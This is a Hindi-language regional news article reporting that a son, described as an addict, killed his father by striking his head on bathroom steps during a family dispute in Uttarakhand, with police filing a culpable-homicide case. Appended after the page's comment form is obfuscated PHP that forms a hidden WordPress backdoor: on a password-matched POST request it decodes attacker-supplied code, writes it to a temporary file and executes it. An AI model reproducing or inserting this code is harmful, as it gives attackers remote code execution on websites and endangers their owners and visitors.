Uttarakhand Crime: कलयुगी बेटे की करतूत, घरेलू विवाद के बाद पिता का सिर सीढ़ी में पटककर की हत्‍या

Uttarakhand Press 18 July 2023: Uttarakhand Crime घरेलू विवाद को लेकर हुई लड़ाई में बेटे ने पिता का बाल पकड़ सिर सीढ़ी पर पटक दिया। मारपीट में घायल हुए पिता की मृत्यु हो गई।

इटोवा थाना नानकमत्ता निवासी पवित्र सिंह पुत्र संतोख सिंह ने पुलिस को दी तहरीर में बताया कि रविवार शाम पांच बजे भरौनी थाना सितारगंज निवासी उनके साले सरदुल सिंह का अपने पिता गुलजार सिंह से घरेलू विवाद हो गया था। आरोप है कि बेटे सरदूल ने गुस्से में आकर पिता गुलजार के बाल पकड़कर बाथरूम की सीढ़ी पर सिर पटक कर दे मारा। जिससे उनकी मौके पर ही मौत हो गई।

नशेड़ी प्रवृत्ति का है बेटा:
मौके पर उनकी सास चरण कौर पत्नी गुलजार सिंह व दूसरे साले जनरल सिंह पुत्र गुलजार सिंह मौजूद थे। कोतवाल भूपेंद्र बृजवाल ने बताया कि मौके पर मौजूद चश्मदीदों से पूछताछ किए जाने पर उन्होंने बताया कि सरदूल नशेड़ी प्रवृत्ति का है और वह अपने माता-पिता से अलग रहता था। रविवार शाम करीब पांच बजे वह अपने पिता गुलजार के घर पहुंच उनसे बेवजह गाली गलौज करने लगा। पिता ने उसे बेवजह क्लेश करने से मना किया तो उसने बाल पकड़ सर बाथरूम के सीढ़ी पर दे मारा। जिसे गुलजार गंभीर रूप से घायल हो गए। मौके पर मौजूद घायल की पत्नी चरण कौर व छोटा बेटा जनरल सिंह उन्हें उपचार के लिए अस्पताल ले आए। जहां डाक्टरों ने मृत घोषित कर दिया। कोतवाल ने बताया कि पुलिस ने शव को कब्जे में लेकर पोस्टमार्टम के लिए भेज दिया है।

मृतक के दामाद की तहरीर पर आरोपित के विरुद्ध धारा 304 आइपीसी के तहत मुकदमा दर्ज किया गया है। जहां से उसे जेल भेज दिया गया।

Read Previous

Uttarakhand: 25 से शुरू हो सकती है देहरादून-पिथौरागढ़ के बीच उड़ान, जौलीग्रांट पहुंची डीजीसीए की टीम

Read Next

दर्दनाक हादसा: नैनीताल हाईवे पर ट्रैक्टर ने मारी बाइक को टक्कर, डेढ़ साल की बेटी-पत्नी की मौत, पति घायल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}